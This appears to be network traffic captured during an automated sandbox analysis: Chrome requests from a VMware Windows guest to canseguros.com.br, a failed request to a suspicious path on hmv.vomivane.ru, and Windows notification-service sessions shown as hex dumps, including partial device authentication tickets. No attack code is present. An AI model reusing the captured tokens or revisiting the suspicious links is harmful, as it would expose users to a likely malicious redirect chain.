2024-12-19 19:20:27 UTC	249	OUT	Data Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
2024-12-19 19:20:27 UTC	1084	OUT	Data Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 2f 44 64 4c 39 54 4f 53 75 30 32 6c 4d 68 65 39 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 35 37 62 65 38 32 64 34 62 30 33 34 37 30 64 38 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 65 37 33 70 6a 43 66 4b 2b 45 44 33 4f 55 4a 65 76 57 5a 50 33 6b 37 65 72 61 71 6e 67 6e 56 55 76 57 47 6e 58 4c 2b 74 6e 6a 4c 34 68 74 79 74 41 30 30 49 46 33 57 71 71 74 32 50 50 53 68 41 54 31 32 6c 6b 64 61 4b 6a 49 34 54 35 51 6c 33 72 41 53 79 51 6c 72 36 6b 34 49 35 6d 32 64 71 57 6c 63 4b 50 4e 75 67 68 50 65 47 41 Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: /DdL9TOSu02lMhe9.2Context: 57be82d4b03470d8<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAe73pjCfK+ED3OUJevWZP3k7eraqngnVUvWGnXL+tnjL4htytA00IF3Wqqt2PPShAT12lkdaKjI4T5Ql3rASyQlr6k4I5m2dqWlcKPNughPeGA
2024-12-19 19:20:27 UTC	218	OUT	Data Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 2f 44 64 4c 39 54 4f 53 75 30 32 6c 4d 68 65 39 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 35 37 62 65 38 32 64 34 62 30 33 34 37 30 64 38 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e Data Ascii: BND 3 CON\WNS 0 197MS-CV: /DdL9TOSu02lMhe9.3Context: 57be82d4b03470d8<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
2024-12-19 19:20:28 UTC	14	IN	Data Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a Data Ascii: 202 1 CON 58
2024-12-19 19:20:28 UTC	58	IN	Data Raw: 4d 53 2d 43 56 3a 20 7a 33 6c 54 77 72 6f 78 7a 30 6d 6c 35 32 76 66 2b 2b 65 72 4d 67 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e Data Ascii: MS-CV: z3lTwroxz0ml52vf++erMg.0Payload parsing failed.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.6	49716	13.227.8.47	443	3060	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-19 19:20:28 UTC	592	OUT	GET /enablecomp.com HTTP/1.1 Host: logo.clearbit.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://canseguros.com.br/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-12-19 19:20:29 UTC	548	IN	HTTP/1.1 200 OK Content-Type: image/png Transfer-Encoding: chunked Connection: close access-control-allow-origin: * Cache-Control: public, max-age=2592000 Date: Thu, 19 Dec 2024 19:20:29 GMT x-envoy-response-flags: - Server: Clearbit strict-transport-security: max-age=63072000; includeSubDomains; preload x-content-type-options: nosniff X-Cache: Miss from cloudfront Via: 1.1 2d4d085f20577a6aef404b4e48f97a1c.cloudfront.net (CloudFront) X-Amz-Cf-Pop: BAH53-C1 X-Amz-Cf-Id: kojK-KD16czcSOLLMj215PXY-dn0HPKcYt-j5dS2M4DY7J0gO560Dg==
2024-12-19 19:20:29 UTC	13166	IN	Data Raw: 33 33 36 36 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 80 00 00 00 80 08 02 00 00 00 4c 5c f6 9c 00 00 33 2d 49 44 41 54 78 9c ec fd 59 97 5d c9 75 27 86 ef bd 23 e2 0c 77 ca 19 09 a0 00 14 6a ae 62 91 14 45 aa 29 36 45 51 14 b5 a8 d6 ea fe 37 ff 5e ea 5e 7a f3 8b 1f bc fc 19 fc 61 ec a7 5e f2 9b bd da b6 3c 76 bb db 94 da ea 16 49 a9 38 b3 0a 55 00 0a 63 ce 79 f3 8e e7 44 c4 de 5e 11 71 ee cd 8b c4 5c 09 14 28 19 51 58 59 77 3c e7 dc bd 63 4f bf 3d 1c 2d 22 f0 72 bd b8 45 2f fa 02 fe bf be 5e 32 e0 05 af 97 0c 78 c1 eb 25 03 5e f0 7a c9 80 17 bc 5e 32 e0 05 af 97 0c 78 c1 eb 25 03 5e f0 7a c9 80 17 bc 5e 32 e0 05 af 97 0c 78 c1 eb 25 03 5e f0 7a c9 80 17 bc 5e 32 e0 05 2f fd a2 2f e0 f1 4b 44 10 31 fd 9d 3f 9d bf eb bd b7 d6 56 55 e5 Data Ascii: 3366PNGIHDRL\3-IDATxY]u'#wjbE)6EQ7^^za^<vI8UcyD^q\(QXYw<cO=-"rE/^2x%^z^2x%^z^2x%^z^2//KD1?VU
2024-12-19 19:20:29 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.6	49721	162.241.2.141	443	3060	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-19 19:20:31 UTC	606	OUT	GET /favicon.ico HTTP/1.1 Host: canseguros.com.br Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://canseguros.com.br/homecoming/index Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-12-19 19:20:31 UTC	176	IN	HTTP/1.1 200 OK Date: Thu, 19 Dec 2024 19:20:31 GMT Server: Apache Upgrade: h2,h2c Connection: Upgrade, close Content-Length: 0 Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.6	49722	13.227.8.64	443	3060	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-19 19:20:31 UTC	355	OUT	GET /enablecomp.com HTTP/1.1 Host: logo.clearbit.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-12-19 19:20:32 UTC	555	IN	HTTP/1.1 200 OK Content-Type: image/png Transfer-Encoding: chunked Connection: close access-control-allow-origin: * Cache-Control: public, max-age=2592000 Date: Thu, 19 Dec 2024 19:20:29 GMT x-envoy-response-flags: - Server: Clearbit strict-transport-security: max-age=63072000; includeSubDomains; preload x-content-type-options: nosniff X-Cache: Hit from cloudfront Via: 1.1 217d459a3c67cafb927fcead306b897e.cloudfront.net (CloudFront) X-Amz-Cf-Pop: BAH53-C1 X-Amz-Cf-Id: PT5EojfErdAfVXPpML8FTzf6vaPmttNVv8IKMsQP5AoKfv7Ozij0_Q== Age: 3
2024-12-19 19:20:32 UTC	13166	IN	Data Raw: 33 33 36 36 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 80 00 00 00 80 08 02 00 00 00 4c 5c f6 9c 00 00 33 2d 49 44 41 54 78 9c ec fd 59 97 5d c9 75 27 86 ef bd 23 e2 0c 77 ca 19 09 a0 00 14 6a ae 62 91 14 45 aa 29 36 45 51 14 b5 a8 d6 ea fe 37 ff 5e ea 5e 7a f3 8b 1f bc fc 19 fc 61 ec a7 5e f2 9b bd da b6 3c 76 bb db 94 da ea 16 49 a9 38 b3 0a 55 00 0a 63 ce 79 f3 8e e7 44 c4 de 5e 11 71 ee cd 8b c4 5c 09 14 28 19 51 58 59 77 3c e7 dc bd 63 4f bf 3d 1c 2d 22 f0 72 bd b8 45 2f fa 02 fe bf be 5e 32 e0 05 af 97 0c 78 c1 eb 25 03 5e f0 7a c9 80 17 bc 5e 32 e0 05 af 97 0c 78 c1 eb 25 03 5e f0 7a c9 80 17 bc 5e 32 e0 05 af 97 0c 78 c1 eb 25 03 5e f0 7a c9 80 17 bc 5e 32 e0 05 2f fd a2 2f e0 f1 4b 44 10 31 fd 9d 3f 9d bf eb bd b7 d6 56 55 e5 Data Ascii: 3366PNGIHDRL\3-IDATxY]u'#wjbE)6EQ7^^za^<vI8UcyD^q\(QXYw<cO=-"rE/^2x%^z^2x%^z^2x%^z^2//KD1?VU
2024-12-19 19:20:32 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.6	49727	162.241.2.141	443	3060	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-19 19:20:33 UTC	352	OUT	GET /favicon.ico HTTP/1.1 Host: canseguros.com.br Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-12-19 19:20:33 UTC	176	IN	HTTP/1.1 200 OK Date: Thu, 19 Dec 2024 19:20:33 GMT Server: Apache Upgrade: h2,h2c Connection: Upgrade, close Content-Length: 0 Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.6	49732	172.67.134.25	443	3060	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-19 19:20:33 UTC	688	OUT	GET /2b8wjV/ HTTP/1.1 Host: hmv.vomivane.ru Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: navigate Sec-Fetch-Dest: document Referer: https://canseguros.com.br/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-12-19 19:20:37 UTC	960	IN	HTTP/1.1 523 Date: Thu, 19 Dec 2024 19:20:37 GMT Content-Type: text/plain; charset=UTF-8 Content-Length: 15 Connection: close Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=puUolmVyCiZjFMkAtFEacB%2BFLJgIc%2BaHFF0iQYk7WKB%2FW8UrkxrSFS0%2F3L%2BTibHrFqOvVG3e846id%2BA4CVeJtDpeq6YDmAu3Hi2mpGE2j2Sg%2BBGu2jdMiTNVGortkaNmxEM%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Frame-Options: SAMEORIGIN Referrer-Policy: same-origin Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 01 Jan 1970 00:00:01 GMT Server: cloudflare CF-RAY: 8f49c02de9303354-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1846&min_rtt=1843&rtt_var=697&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2820&recv_bytes=1266&delivery_rate=1563169&cwnd=114&unsent_bytes=0&cid=02d6db25d037d0e9&ts=3480&x=0"
2024-12-19 19:20:37 UTC	15	IN	Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 35 32 33 Data Ascii: error code: 523

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.6	49733	172.67.134.25	443	3060	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-19 19:20:37 UTC	593	OUT	GET /favicon.ico HTTP/1.1 Host: hmv.vomivane.ru Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://hmv.vomivane.ru/2b8wjV/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-12-19 19:20:40 UTC	1072	IN	HTTP/1.1 404 Not Found Date: Thu, 19 Dec 2024 19:20:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Cache-Control: max-age=14400 Age: 80851 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ty4JtuEq9zH3JnwYhtqmx5PhAv%2B%2FaN4BSTi3NvDrv57vmYCGoVFKAwxSqb7XeHBQ2oiR1q43nEaQ7Rv8F%2B96jFwbTvoO%2BmVPG01I3m1hVfdT9dBJ049Xskca1MeHQA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Vary: Accept-Encoding alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2033&min_rtt=1820&rtt_var=881&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2825&recv_bytes=1465&delivery_rate=1479692&cwnd=252&unsent_bytes=0&cid=e6bdf8cac38c4b5f&ts=46&x=0" CF-Cache-Status: STALE Server: cloudflare CF-RAY: 8f49c043397e7d20-EWR server-timing: cfL4;desc="?proto=TCP&rtt=1861&min_rtt=1860&rtt_var=700&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2821&recv_bytes=1171&delivery_rate=1559829&cwnd=207&unsent_bytes=0&cid=a6d91c242630e7b1&ts=6963&x=0"
2024-12-19 19:20:40 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.6	49745	35.190.80.1	443	3060	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-19 19:20:38 UTC	544	OUT	OPTIONS /report/v4?s=puUolmVyCiZjFMkAtFEacB%2BFLJgIc%2BaHFF0iQYk7WKB%2FW8UrkxrSFS0%2F3L%2BTibHrFqOvVG3e846id%2BA4CVeJtDpeq6YDmAu3Hi2mpGE2j2Sg%2BBGu2jdMiTNVGortkaNmxEM%3D HTTP/1.1 Host: a.nel.cloudflare.com Connection: keep-alive Origin: https://hmv.vomivane.ru Access-Control-Request-Method: POST Access-Control-Request-Headers: content-type User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-12-19 19:20:39 UTC	336	IN	HTTP/1.1 200 OK Content-Length: 0 access-control-max-age: 86400 access-control-allow-methods: POST, OPTIONS access-control-allow-origin: * access-control-allow-headers: content-type, content-length date: Thu, 19 Dec 2024 19:20:39 GMT Via: 1.1 google Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port
9	192.168.2.6	49746	20.198.118.190	443

Timestamp	Bytes transferred	Direction	Data
2024-12-19 19:20:39 UTC	71	OUT	Data Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 6a 64 2b 54 69 42 59 77 6a 6b 4f 46 31 5a 31 73 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 38 36 64 30 66 61 65 32 37 39 34 39 63 63 34 31 0d 0a 0d 0a Data Ascii: CNT 1 CON 305MS-CV: jd+TiBYwjkOF1Z1s.1Context: 86d0fae27949cc41
2024-12-19 19:20:39 UTC	249	OUT	Data Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
2024-12-19 19:20:39 UTC	1084	OUT	Data Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 6a 64 2b 54 69 42 59 77 6a 6b 4f 46 31 5a 31 73 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 38 36 64 30 66 61 65 32 37 39 34 39 63 63 34 31 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 65 37 33 70 6a 43 66 4b 2b 45 44 33 4f 55 4a 65 76 57 5a 50 33 6b 37 65 72 61 71 6e 67 6e 56 55 76 57 47 6e 58 4c 2b 74 6e 6a 4c 34 68 74 79 74 41 30 30 49 46 33 57 71 71 74 32 50 50 53 68 41 54 31 32 6c 6b 64 61 4b 6a 49 34 54 35 51 6c 33 72 41 53 79 51 6c 72 36 6b 34 49 35 6d 32 64 71 57 6c 63 4b 50 4e 75 67 68 50 65 47 41 Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: jd+TiBYwjkOF1Z1s.2Context: 86d0fae27949cc41<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAe73pjCfK+ED3OUJevWZP3k7eraqngnVUvWGnXL+tnjL4htytA00IF3Wqqt2PPShAT12lkdaKjI4T5Ql3rASyQlr6k4I5m2dqWlcKPNughPeGA
2024-12-19 19:20:39 UTC	218	OUT	Data Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 6a 64 2b 54 69 42 59 77 6a 6b 4f 46 31 5a 31 73 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 38 36 64 30 66 61 65 32 37 39 34 39 63 63 34 31 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e Data Ascii: BND 3 CON\WNS 0 197MS-CV: jd+TiBYwjkOF1Z1s.3Context: 86d0fae27949cc41<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
2024-12-19 19:20:40 UTC	14	IN	Data Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a Data Ascii: 202 1 CON 58
2024-12-19 19:20:40 UTC	58	IN	Data Raw: 4d 53 2d 43 56 3a 20 58 64 63 4b 42 38 4c 47 48 6b 47 58 4f 5a 32 4f 4d 42 6c 63 45 67 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e Data Ascii: MS-CV: XdcKB8LGHkGXOZ2OMBlcEg.0Payload parsing failed.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.6	49753	35.190.80.1	443	3060	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-19 19:20:40 UTC	486	OUT	POST /report/v4?s=puUolmVyCiZjFMkAtFEacB%2BFLJgIc%2BaHFF0iQYk7WKB%2FW8UrkxrSFS0%2F3L%2BTibHrFqOvVG3e846id%2BA4CVeJtDpeq6YDmAu3Hi2mpGE2j2Sg%2BBGu2jdMiTNVGortkaNmxEM%3D HTTP/1.1 Host: a.nel.cloudflare.com Connection: keep-alive Content-Length: 419 Content-Type: application/reports+json User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-12-19 19:20:40 UTC	419	OUT	Data Raw: 5b 7b 22 61 67 65 22 3a 31 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 36 33 34 33 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 63 61 6e 73 65 67 75 72 6f 73 2e 63 6f 6d 2e 62 72 2f 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 37 32 2e 36 37 2e 31 33 34 2e 32 35 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 35 32 33 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f 72 22 2c 22 75 72 6c Data Ascii: [{"age":1,"body":{"elapsed_time":6343,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"https://canseguros.com.br/","sampling_fraction":1.0,"server_ip":"172.67.134.25","status_code":523,"type":"http.error"},"type":"network-error","url
2024-12-19 19:20:40 UTC	168	IN	HTTP/1.1 200 OK Content-Length: 0 date: Thu, 19 Dec 2024 19:20:40 GMT Via: 1.1 google Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port
11	192.168.2.6	49781	20.198.118.190	443

Timestamp	Bytes transferred	Direction	Data
2024-12-19 19:20:52 UTC	71	OUT	Data Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 6f 55 6c 42 2b 5a 54 50 70 45 43 71 77 2f 4b 55 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 61 33 33 36 35 35 31 32 37 32 34 39 65 35 62 66 0d 0a 0d 0a Data Ascii: CNT 1 CON 305MS-CV: oUlB+ZTPpECqw/KU.1Context: a33655127249e5bf
2024-12-19 19:20:52 UTC	249	OUT	Data Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e Data Ascii: 